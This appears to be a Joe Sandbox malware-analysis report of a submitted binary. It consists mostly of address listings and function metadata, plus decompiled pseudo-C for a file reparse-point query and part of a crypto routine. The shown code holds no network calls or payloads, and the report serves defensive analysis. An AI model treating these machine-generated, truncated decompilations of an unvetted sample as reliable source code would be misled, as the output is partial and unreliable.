                                                                                                                    0x00b2d3f4
                                                                                                                    0x00b2d3f7
                                                                                                                    0x00b2d3fd
                                                                                                                    0x00b2d403
                                                                                                                    0x00b2d405
                                                                                                                    0x00b2d408
                                                                                                                    0x00b2d429
                                                                                                                    0x00b2d42c
                                                                                                                    0x00b2d439
                                                                                                                    0x00b2d43b
                                                                                                                    0x00b2d43d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d446
                                                                                                                    0x00b2d44a
                                                                                                                    0x00b2d44e
                                                                                                                    0x00b2d451
                                                                                                                    0x00b2d454
                                                                                                                    0x00b2d457
                                                                                                                    0x00b2d466
                                                                                                                    0x00b2d466
                                                                                                                    0x00b2d46a
                                                                                                                    0x00b2d46a
                                                                                                                    0x00b2d46d
                                                                                                                    0x00b2d470
                                                                                                                    0x00b2d595
                                                                                                                    0x00b2d595
                                                                                                                    0x00b2d599
                                                                                                                    0x00b2d6a4
                                                                                                                    0x00b2d6a4
                                                                                                                    0x00b2d6a7
                                                                                                                    0x00b2d6a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d6b8
                                                                                                                    0x00b2d6bc
                                                                                                                    0x00b2d6c1
                                                                                                                    0x00b2d6c4
                                                                                                                    0x00b2d6c7
                                                                                                                    0x00b2d6ca
                                                                                                                    0x00b2d6d7
                                                                                                                    0x00b2d6dc
                                                                                                                    0x00b2d6df
                                                                                                                    0x00b2d6e2
                                                                                                                    0x00b2d6e4
                                                                                                                    0x00b2d6e7
                                                                                                                    0x00b2d708
                                                                                                                    0x00b2d719
                                                                                                                    0x00b2d71b
                                                                                                                    0x00b2d71f
                                                                                                                    0x00b2d721
                                                                                                                    0x00b2d724
                                                                                                                    0x00b2d74b
                                                                                                                    0x00b2d754
                                                                                                                    0x00b2d75a
                                                                                                                    0x00b2d75d
                                                                                                                    0x00b2d761
                                                                                                                    0x00b2d763
                                                                                                                    0x00b2d767
                                                                                                                    0x00b2d767
                                                                                                                    0x00b2d76c
                                                                                                                    0x00b2d76c
                                                                                                                    0x00000000
                                                                                                                    0x00b2d76c
                                                                                                                    0x00000000
                                                                                                                    0x00b2d724
                                                                                                                    0x00b2d6e9
                                                                                                                    0x00b2d6ef
                                                                                                                    0x00b2d6f2
                                                                                                                    0x00b2d6f5
                                                                                                                    0x00b2d6fa
                                                                                                                    0x00b2d6fd
                                                                                                                    0x00b2d700
                                                                                                                    0x00b2d705
                                                                                                                    0x00b2d705
                                                                                                                    0x00b2d705
                                                                                                                    0x00000000
                                                                                                                    0x00b2d6ef
                                                                                                                    0x00b2d59f
                                                                                                                    0x00b2d5a2
                                                                                                                    0x00b2d5a5
                                                                                                                    0x00b2d5a8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d5b1
                                                                                                                    0x00b2d5b3
                                                                                                                    0x00b2d5b6
                                                                                                                    0x00b2d5b6
                                                                                                                    0x00b2d5b9
                                                                                                                    0x00b2d5bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d5be
                                                                                                                    0x00b2d5be
                                                                                                                    0x00b2d5c4
                                                                                                                    0x00b2d5c9
                                                                                                                    0x00b2d5cc
                                                                                                                    0x00b2d5ce
                                                                                                                    0x00b2d5d0
                                                                                                                    0x00b2d5d2
                                                                                                                    0x00b2d5d2
                                                                                                                    0x00b2d5d0
                                                                                                                    0x00b2d5d5
                                                                                                                    0x00b2d5d8
                                                                                                                    0x00b2d5db
                                                                                                                    0x00b2d5e2
                                                                                                                    0x00b2d5e4
                                                                                                                    0x00b2d5e6
                                                                                                                    0x00b2d5e8
                                                                                                                    0x00b2d5e8
                                                                                                                    0x00b2d5e6
                                                                                                                    0x00b2d5eb
                                                                                                                    0x00b2d5ec
                                                                                                                    0x00b2d5ef
                                                                                                                    0x00b2d5ef
                                                                                                                    0x00b2d5f4
                                                                                                                    0x00b2d5f4
                                                                                                                    0x00b2d5fa
                                                                                                                    0x00b2d5fa
                                                                                                                    0x00b2d5fa
                                                                                                                    0x00b2d5fa
                                                                                                                    0x00b2d5ff
                                                                                                                    0x00b2d602
                                                                                                                    0x00b2d604
                                                                                                                    0x00b2d0fa
                                                                                                                    0x00b2d0fa
                                                                                                                    0x00b2d101
                                                                                                                    0x00b2d101
                                                                                                                    0x00b2d101
                                                                                                                    0x00b2d106
                                                                                                                    0x00000000
                                                                                                                    0x00b2d106
                                                                                                                    0x00b2d60a
                                                                                                                    0x00b2d60d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d616
                                                                                                                    0x00b2d61a
                                                                                                                    0x00b2d623
                                                                                                                    0x00b2d629
                                                                                                                    0x00b2d62c
                                                                                                                    0x00b2d630
                                                                                                                    0x00b2d632
                                                                                                                    0x00b2d636
                                                                                                                    0x00b2d636
                                                                                                                    0x00b2d63b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d476
                                                                                                                    0x00b2d476
                                                                                                                    0x00b2d47f
                                                                                                                    0x00b2d481
                                                                                                                    0x00b2d485
                                                                                                                    0x00b2d4fa
                                                                                                                    0x00b2d500
                                                                                                                    0x00b2d487
                                                                                                                    0x00b2d490
                                                                                                                    0x00b2d49f
                                                                                                                    0x00b2d4a3
                                                                                                                    0x00b2d4bb
                                                                                                                    0x00b2d4c5
                                                                                                                    0x00b2d4d4
                                                                                                                    0x00b2d4d7
                                                                                                                    0x00b2d4da
                                                                                                                    0x00b2d4dd
                                                                                                                    0x00b2d4e3
                                                                                                                    0x00b2d4e6
                                                                                                                    0x00b2d4ed
                                                                                                                    0x00b2d4f2
                                                                                                                    0x00b2d4f2
                                                                                                                    0x00b2d509
                                                                                                                    0x00b2d510
                                                                                                                    0x00b2d512
                                                                                                                    0x00b2d516
                                                                                                                    0x00b2d516
                                                                                                                    0x00b2d517
                                                                                                                    0x00b2d51b
                                                                                                                    0x00b2d51e
                                                                                                                    0x00b2d572
                                                                                                                    0x00b2d57a
                                                                                                                    0x00b2d57c
                                                                                                                    0x00b2d57e
                                                                                                                    0x00b2d673
                                                                                                                    0x00b2d676
                                                                                                                    0x00b2d67a
                                                                                                                    0x00b2d683
                                                                                                                    0x00b2d689
                                                                                                                    0x00b2d68c
                                                                                                                    0x00b2d690
                                                                                                                    0x00b2d692
                                                                                                                    0x00b2d69a
                                                                                                                    0x00b2d69a
                                                                                                                    0x00000000
                                                                                                                    0x00b2d692
                                                                                                                    0x00b2d520
                                                                                                                    0x00b2d520
                                                                                                                    0x00b2d523
                                                                                                                    0x00b2d526
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d52b
                                                                                                                    0x00b2d52b
                                                                                                                    0x00b2d52f
                                                                                                                    0x00b2d531
                                                                                                                    0x00b2d534
                                                                                                                    0x00b2d536
                                                                                                                    0x00b2d539
                                                                                                                    0x00b2d53b
                                                                                                                    0x00b2d53d
                                                                                                                    0x00b2d53d
                                                                                                                    0x00b2d539
                                                                                                                    0x00b2d54a
                                                                                                                    0x00b2d555
                                                                                                                    0x00b2d55a
                                                                                                                    0x00b2d55c
                                                                                                                    0x00b2d55f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d565
                                                                                                                    0x00b2d56b
                                                                                                                    0x00b2d56e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d570
                                                                                                                    0x00b2d646
                                                                                                                    0x00b2d64a
                                                                                                                    0x00b2d653
                                                                                                                    0x00b2d659
                                                                                                                    0x00b2d65c
                                                                                                                    0x00b2d660
                                                                                                                    0x00b2d662
                                                                                                                    0x00b2d666
                                                                                                                    0x00b2d666
                                                                                                                    0x00b2d66b
                                                                                                                    0x00000000
                                                                                                                    0x00b2d66b
                                                                                                                    0x00b2d584
                                                                                                                    0x00b2d584
                                                                                                                    0x00b2d58a
                                                                                                                    0x00b2d58a
                                                                                                                    0x00b2d593
                                                                                                                    0x00b2d593
                                                                                                                    0x00000000
                                                                                                                    0x00b2d593
                                                                                                                    0x00b2d45c
                                                                                                                    0x00b2d45e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d460
                                                                                                                    0x00000000
                                                                                                                    0x00b2d460
                                                                                                                    0x00b2d40a
                                                                                                                    0x00b2d410
                                                                                                                    0x00b2d413
                                                                                                                    0x00b2d416
                                                                                                                    0x00b2d41b
                                                                                                                    0x00b2d41e
                                                                                                                    0x00b2d421
                                                                                                                    0x00b2d426
                                                                                                                    0x00b2d426
                                                                                                                    0x00b2d426
                                                                                                                    0x00000000
                                                                                                                    0x00b2d410
                                                                                                                    0x00b2d3cb
                                                                                                                    0x00b2d3cb
                                                                                                                    0x00000000
                                                                                                                    0x00b2d3cb
                                                                                                                    0x00b2d328
                                                                                                                    0x00b2d32b
                                                                                                                    0x00b2d32e
                                                                                                                    0x00b2d363
                                                                                                                    0x00b2d369
                                                                                                                    0x00b2d372
                                                                                                                    0x00b2d377
                                                                                                                    0x00b2d37a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d37c
                                                                                                                    0x00b2d37e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d380
                                                                                                                    0x00b2d330
                                                                                                                    0x00b2d336
                                                                                                                    0x00b2d33c
                                                                                                                    0x00b2d341
                                                                                                                    0x00b2d343
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d349
                                                                                                                    0x00b2d34b
                                                                                                                    0x00b2d34d
                                                                                                                    0x00b2d350
                                                                                                                    0x00b2d388
                                                                                                                    0x00b2d38c
                                                                                                                    0x00b2d395
                                                                                                                    0x00b2d39b
                                                                                                                    0x00b2d39e
                                                                                                                    0x00b2d3a2
                                                                                                                    0x00b2d3a4
                                                                                                                    0x00b2d3a8
                                                                                                                    0x00b2d3a8
                                                                                                                    0x00b2d3ad
                                                                                                                    0x00000000
                                                                                                                    0x00b2d3ad
                                                                                                                    0x00b2d352
                                                                                                                    0x00b2d355
                                                                                                                    0x00b2d35e
                                                                                                                    0x00b2d361
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d361
                                                                                                                    0x00000000
                                                                                                                    0x00b2d336
                                                                                                                    0x00b2d314
                                                                                                                    0x00b2d316
                                                                                                                    0x00b2d318
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d1e5
                                                                                                                    0x00b2d1e5
                                                                                                                    0x00b2d1e8
                                                                                                                    0x00b2d1f1
                                                                                                                    0x00b2d1f3
                                                                                                                    0x00b2d1f5
                                                                                                                    0x00b2d1f7
                                                                                                                    0x00b2d205
                                                                                                                    0x00b2d21f
                                                                                                                    0x00b2d22f
                                                                                                                    0x00b2d232
                                                                                                                    0x00b2d239
                                                                                                                    0x00b2d239
                                                                                                                    0x00b2d23c
                                                                                                                    0x00b2d249
                                                                                                                    0x00b2d249
                                                                                                                    0x00b2d24e
                                                                                                                    0x00b2d251
                                                                                                                    0x00b2d25b
                                                                                                                    0x00b2d25e
                                                                                                                    0x00b2d25e
                                                                                                                    0x00b2d260
                                                                                                                    0x00b2d265
                                                                                                                    0x00b2d268
                                                                                                                    0x00b2d283
                                                                                                                    0x00b2d283
                                                                                                                    0x00b2d283
                                                                                                                    0x00b2d26a
                                                                                                                    0x00b2d26c
                                                                                                                    0x00b2d26f
                                                                                                                    0x00b2d272
                                                                                                                    0x00b2d275
                                                                                                                    0x00b2d278
                                                                                                                    0x00b2d27b
                                                                                                                    0x00b2d27b
                                                                                                                    0x00b2d28d
                                                                                                                    0x00b2d290
                                                                                                                    0x00b2d29b
                                                                                                                    0x00b2d29e
                                                                                                                    0x00b2d29e
                                                                                                                    0x00b2d29e
                                                                                                                    0x00b2d2a1
                                                                                                                    0x00b2d2a1
                                                                                                                    0x00b2d2a6
                                                                                                                    0x00b2d2aa
                                                                                                                    0x00b2d2ac
                                                                                                                    0x00b2d2b2
                                                                                                                    0x00b2d2b8
                                                                                                                    0x00b2d2bb
                                                                                                                    0x00b2d2bb
                                                                                                                    0x00b2d2bb
                                                                                                                    0x00b2d2bb
                                                                                                                    0x00b2d2bf
                                                                                                                    0x00b2d2c3
                                                                                                                    0x00b2d2d5
                                                                                                                    0x00b2d2d9
                                                                                                                    0x00b2d2dc
                                                                                                                    0x00b2d2df
                                                                                                                    0x00b2d2e5
                                                                                                                    0x00b2d2ed
                                                                                                                    0x00b2d2ef
                                                                                                                    0x00b2d2f1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d2f1
                                                                                                                    0x00000000
                                                                                                                    0x00b2d2c3
                                                                                                                    0x00b2d1f9
                                                                                                                    0x00b2d200
                                                                                                                    0x00b2d202
                                                                                                                    0x00b2d202
                                                                                                                    0x00b2d204
                                                                                                                    0x00000000
                                                                                                                    0x00b2d204
                                                                                                                    0x00b2d1fb
                                                                                                                    0x00b2d1fe
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d2f7
                                                                                                                    0x00b2d2f7
                                                                                                                    0x00b2d2fd
                                                                                                                    0x00b2d2fd
                                                                                                                    0x00b2d306
                                                                                                                    0x00b2d306
                                                                                                                    0x00000000
                                                                                                                    0x00b2d306
                                                                                                                    0x00b2d0e8
                                                                                                                    0x00b2d0ed
                                                                                                                    0x00b2d0f2
                                                                                                                    0x00b2d0f4
                                                                                                                    0x00b2d1cc
                                                                                                                    0x00b2d1d0
                                                                                                                    0x00b2d1d6
                                                                                                                    0x00000000
                                                                                                                    0x00b2d1d6
                                                                                                                    0x00000000
                                                                                                                    0x00b2d079
                                                                                                                    0x00b2d07c
                                                                                                                    0x00b2d082
                                                                                                                    0x00b2d085
                                                                                                                    0x00b2d08f
                                                                                                                    0x00b2d097
                                                                                                                    0x00b2d09a
                                                                                                                    0x00b2d09f
                                                                                                                    0x00b2d0a5
                                                                                                                    0x00b2d0a8
                                                                                                                    0x00b2d0ab
                                                                                                                    0x00b2d0b1
                                                                                                                    0x00b2d0b1
                                                                                                                    0x00b2d0b1
                                                                                                                    0x00b2d0b1
                                                                                                                    0x00b2d0b6
                                                                                                                    0x00b2d0b6
                                                                                                                    0x00000000
                                                                                                                    0x00b2d0b6
                                                                                                                    0x00b2d077
                                                                                                                    0x00b2cec6
                                                                                                                    0x00b2cec6
                                                                                                                    0x00b2cecc
                                                                                                                    0x00b2cecc
                                                                                                                    0x00b2ced4
                                                                                                                    0x00b2cedc
                                                                                                                    0x00b2cee6
                                                                                                                    0x00b2ceed
                                                                                                                    0x00b2cef6
                                                                                                                    0x00b2cefc
                                                                                                                    0x00b2cf04
                                                                                                                    0x00b2cf05
                                                                                                                    0x00b2cf0b
                                                                                                                    0x00b2cf0b
                                                                                                                    0x00b2cf19
                                                                                                                    0x00b2cf23
                                                                                                                    0x00b2cf2c
                                                                                                                    0x00b2cf2e
                                                                                                                    0x00b2cf30
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2cf3c
                                                                                                                    0x00b2cf44
                                                                                                                    0x00b2cf49
                                                                                                                    0x00b2cf4c
                                                                                                                    0x00b2cf57
                                                                                                                    0x00b2cf5d
                                                                                                                    0x00b2cf61
                                                                                                                    0x00b2cf69
                                                                                                                    0x00b2cf6d
                                                                                                                    0x00b2cf6e
                                                                                                                    0x00b2cf79
                                                                                                                    0x00b2cf7d
                                                                                                                    0x00b2cf7e
                                                                                                                    0x00b2cf83
                                                                                                                    0x00b2cf86
                                                                                                                    0x00b2cf8a
                                                                                                                    0x00b2cf8b
                                                                                                                    0x00b2cf90
                                                                                                                    0x00b2cf94
                                                                                                                    0x00b2cf98
                                                                                                                    0x00b2d00e
                                                                                                                    0x00b2d00e
                                                                                                                    0x00b2d013
                                                                                                                    0x00b2d017
                                                                                                                    0x00b2d01a
                                                                                                                    0x00b2d01d
                                                                                                                    0x00b2d020
                                                                                                                    0x00b2d021
                                                                                                                    0x00b2d027
                                                                                                                    0x00b2d02a
                                                                                                                    0x00b2d02d
                                                                                                                    0x00b2d02f
                                                                                                                    0x00b2d02f
                                                                                                                    0x00b2d036
                                                                                                                    0x00b2d03a
                                                                                                                    0x00b2d03c
                                                                                                                    0x00b2d040
                                                                                                                    0x00b2d040
                                                                                                                    0x00b2d043
                                                                                                                    0x00b2d046
                                                                                                                    0x00b2d04f
                                                                                                                    0x00b2d052
                                                                                                                    0x00000000
                                                                                                                    0x00b2d058
                                                                                                                    0x00b2d058
                                                                                                                    0x00b2d05b
                                                                                                                    0x00b2d05b
                                                                                                                    0x00000000
                                                                                                                    0x00b2d05b
                                                                                                                    0x00b2d052
                                                                                                                    0x00b2cf9a
                                                                                                                    0x00b2cf9d
                                                                                                                    0x00b2cfa0
                                                                                                                    0x00b2cfa0
                                                                                                                    0x00b2cfa7
                                                                                                                    0x00b2cfbc
                                                                                                                    0x00b2cfc3
                                                                                                                    0x00b2cfc8
                                                                                                                    0x00b2cfca
                                                                                                                    0x00b2cfd0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2cfde
                                                                                                                    0x00b2cfe3
                                                                                                                    0x00b2cfe6
                                                                                                                    0x00b2cff1
                                                                                                                    0x00b2cff1
                                                                                                                    0x00b2cff7
                                                                                                                    0x00b2cffb
                                                                                                                    0x00b2d000
                                                                                                                    0x00b2d003
                                                                                                                    0x00b2d009
                                                                                                                    0x00b2d00c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2d00c
                                                                                                                    0x00b2cfe8
                                                                                                                    0x00b2cfeb
                                                                                                                    0x00b2d1a5
                                                                                                                    0x00b2d1a9
                                                                                                                    0x00b2d1ae
                                                                                                                    0x00b2d1b1
                                                                                                                    0x00b2d1b5
                                                                                                                    0x00b2d1b7
                                                                                                                    0x00b2d1bf
                                                                                                                    0x00b2d1bf
                                                                                                                    0x00000000
                                                                                                                    0x00b2d1b7
                                                                                                                    0x00000000
                                                                                                                    0x00b2cfeb
                                                                                                                    0x00b2d179
                                                                                                                    0x00b2d17d
                                                                                                                    0x00b2d182
                                                                                                                    0x00b2d185
                                                                                                                    0x00b2d189
                                                                                                                    0x00b2d18b
                                                                                                                    0x00b2d18f
                                                                                                                    0x00b2d18f
                                                                                                                    0x00b2d194
                                                                                                                    0x00000000
                                                                                                                    0x00b2d194
                                                                                                                    0x00b2cf4e
                                                                                                                    0x00b2cf51
                                                                                                                    0x00b2d13d
                                                                                                                    0x00b2d141
                                                                                                                    0x00b2d146
                                                                                                                    0x00b2d149
                                                                                                                    0x00b2d14d
                                                                                                                    0x00b2d14f
                                                                                                                    0x00b2d153
                                                                                                                    0x00b2d153
                                                                                                                    0x00b2d158
                                                                                                                    0x00b2d15d
                                                                                                                    0x00b2d15d
                                                                                                                    0x00b2d167
                                                                                                                    0x00b2d16c
                                                                                                                    0x00000000
                                                                                                                    0x00b2d16c
                                                                                                                    0x00000000
                                                                                                                    0x00b2cf51
                                                                                                                    0x00b2d11a
                                                                                                                    0x00b2d11e
                                                                                                                    0x00b2d123
                                                                                                                    0x00b2d126
                                                                                                                    0x00b2d12a
                                                                                                                    0x00b2d12c
                                                                                                                    0x00b2d130
                                                                                                                    0x00b2d130
                                                                                                                    0x00000000
                                                                                                                    0x00b2d12c
                                                                                                                    0x00b2ce94
                                                                                                                    0x00b2ce97
                                                                                                                    0x00b2ce99
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2ce9b
                                                                                                                    0x00000000
                                                                                                                    0x00b2ce9b
                                                                                                                    0x00b2ce3b
                                                                                                                    0x00b2ce42
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2ce44
                                                                                                                    0x00b2ce47
                                                                                                                    0x00b2ce49
                                                                                                                    0x00b2ce4b
                                                                                                                    0x00b2ce58
                                                                                                                    0x00b2ce5a
                                                                                                                    0x00b2ce66
                                                                                                                    0x00b2ce66
                                                                                                                    0x00b2ce5a
                                                                                                                    0x00b2ce71
                                                                                                                    0x00b2ce76
                                                                                                                    0x00b2ce79
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2ce7b
                                                                                                                    0x00b2ce7e
                                                                                                                    0x00b2ce83
                                                                                                                    0x00b2ce8a
                                                                                                                    0x00b2ce8a
                                                                                                                    0x00b2ce8c
                                                                                                                    0x00b2ce8c
                                                                                                                    0x00b2ce7e
                                                                                                                    0x00000000
                                                                                                                    0x00b2ce23
                                                                                                                    0x00b2ce23
                                                                                                                    0x00b2d76e
                                                                                                                    0x00b2d76e
                                                                                                                    0x00b2d778
                                                                                                                    0x00b2d77d
                                                                                                                    0x00b2d77f
                                                                                                                    0x00b2d785
                                                                                                                    0x00b2d78d
                                                                                                                    0x00b2d78d
                                                                                                                    0x00b2ce21
                                                                                                                    0x00b2ce0e
                                                                                                                    0x00b2ce0e
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B2CDC2
                                                                                                                      • Part of subcall function 00B2DAEA: __EH_prolog.LIBCMT ref: 00B2DAEF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 32ab0ea1d418536a4a0626b179dc8aa15e56c31b52e8b02ce25edc856f63f1d9
                                                                                                                    • Instruction ID: 5585eefbe7b4f771203312c7b4b871ad34c0b7f3abfb79d733d716d8dcb1b9c1
                                                                                                                    • Opcode Fuzzy Hash: 32ab0ea1d418536a4a0626b179dc8aa15e56c31b52e8b02ce25edc856f63f1d9
                                                                                                                    • Instruction Fuzzy Hash: 0D625871900269CFDF25DFA4D881BEDBBF1EF18304F1444AAE809AB291D774AE41CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1801A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00B1801A(void* __ecx, void** __edx) {
				intOrPtr _t22;
				void* _t26;
				void* _t32;
				void* _t45;
				int _t48;
				void** _t50;
				void* _t52;

				L00B7F140(0xb83008, _t52);
				_t50 = __edx;
				_t32 = 0;
				_t45 = __ecx;
				_t22 =  *((intOrPtr*)(__edx));
				_t58 = _t22;
				if(_t22 != 0) {
					E00B11E89(_t22, _t22);
					 *((intOrPtr*)(__edx)) = 0;
				}
				 *(_t52 - 0x24) =  *(_t52 - 0x24) | 0xffffffff;
				_t50[1] = _t32;
				 *(_t52 - 0x20) = _t32;
				_push(0x2200000);
				_push(3);
				_push(1);
				_push(_t32);
				_push(_t45);
				 *(_t52 - 4) = _t32;
				if(E00B172B9(_t52 - 0x24, _t58) != 0) {
					if( *(_t52 + 8) != _t32) {
						GetFileInformationByHandle( *(_t52 - 0x24),  *(_t52 + 8));
					}
					_push(0x4000);
					_t26 = E00B11E55();
					 *(_t52 + 8) = _t26;
					 *(_t52 - 0x14) = _t26;
					 *(_t52 - 4) = 1;
					if(DeviceIoControl( *(_t52 - 0x24), 0x900a8, _t32, _t32, _t26, 0x4000, _t52 - 0x10, _t32) != 0) {
						_t48 =  *(_t52 - 0x10);
						_t27 = E00B14268(_t50, _t48);
						if(_t48 != _t32) {
							_t27 = memcpy( *_t50,  *(_t52 + 8), _t48);
						}
						_t32 = 1;
					}
					E00B11E89(_t27,  *(_t52 + 8));
				}
				E00B1736B(_t52 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t32;
			}










                                                                                                                    0x00b1801f
                                                                                                                    0x00b18029
                                                                                                                    0x00b1802b
                                                                                                                    0x00b1802e
                                                                                                                    0x00b18030
                                                                                                                    0x00b18032
                                                                                                                    0x00b18034
                                                                                                                    0x00b18037
                                                                                                                    0x00b1803d
                                                                                                                    0x00b1803d
                                                                                                                    0x00b1803f
                                                                                                                    0x00b18043
                                                                                                                    0x00b18046
                                                                                                                    0x00b18049
                                                                                                                    0x00b1804e
                                                                                                                    0x00b18050
                                                                                                                    0x00b18052
                                                                                                                    0x00b18053
                                                                                                                    0x00b18057
                                                                                                                    0x00b18061
                                                                                                                    0x00b18066
                                                                                                                    0x00b1806e
                                                                                                                    0x00b1806e
                                                                                                                    0x00b18079
                                                                                                                    0x00b1807a
                                                                                                                    0x00b18080
                                                                                                                    0x00b18083
                                                                                                                    0x00b18097
                                                                                                                    0x00b180a3
                                                                                                                    0x00b180a5
                                                                                                                    0x00b180ab
                                                                                                                    0x00b180b2
                                                                                                                    0x00b180ba
                                                                                                                    0x00b180bf
                                                                                                                    0x00b180c2
                                                                                                                    0x00b180c2
                                                                                                                    0x00b180c7
                                                                                                                    0x00b180cc
                                                                                                                    0x00b180d0
                                                                                                                    0x00b180dd
                                                                                                                    0x00b180e5

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B1801F
                                                                                                                    • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00B1806E
                                                                                                                    • DeviceIoControl.KERNEL32 ref: 00B1809B
                                                                                                                    • memcpy.MSVCRT ref: 00B180BA
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1689166341-0
                                                                                                                    • Opcode ID: 7717cfed85334ae8733c31ae95d4741b4fcf1d388a69312b9d70e745f025e59e
                                                                                                                    • Instruction ID: 46f36e198c8508734420df00c5d65f2f404ae41bce231d9b2f6a20e07aa78c73
                                                                                                                    • Opcode Fuzzy Hash: 7717cfed85334ae8733c31ae95d4741b4fcf1d388a69312b9d70e745f025e59e
                                                                                                                    • Instruction Fuzzy Hash: 4D21A472900208BEDF21AF94DC85AEE7BF9FB85740F6041ADF94567251CB314E84CA60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5C88D Relevance: 3.5, APIs: 2, Instructions: 509COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00B5C88D(void* __ecx, signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				intOrPtr __esi;
				signed int _t341;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t363;
				void* _t367;
				void* _t376;
				intOrPtr _t380;
				signed int _t384;
				signed int _t409;
				signed int _t417;
				signed int _t425;
				intOrPtr* _t427;
				void* _t428;
				signed int _t431;
				void* _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				intOrPtr _t444;
				intOrPtr _t447;
				intOrPtr _t449;
				signed char _t452;
				signed int _t453;
				signed int* _t459;
				signed int _t464;
				intOrPtr _t492;
				signed int _t502;
				signed int _t503;
				char _t504;
				signed int _t515;
				void* _t518;
				intOrPtr _t520;
				void* _t521;
				void* _t523;
				void* _t524;

				_t502 = __edx;
				L00B7F140(0xb87915, _t521);
				_t524 = _t523 - 0x90;
				_t518 = __ecx;
				_t341 = L00B5AF91( *((intOrPtr*)(__ecx + 0x38)));
				_t515 =  *(_t521 + 8);
				 *(_t521 - 0x14) = _t341;
				 *(_t521 - 0x10) = _t502;
				if(_t341 != 2) {
					_t425 = 0;
					__eflags = 0;
				} else {
					_t425 = 0;
					_t529 = _t502;
					if(_t502 == 0) {
						L00B5B3F3(__ecx, _t502, _t529, _t515 + 0xf8);
						 *(_t521 - 0x14) = L00B5AF91( *((intOrPtr*)(_t518 + 0x38)));
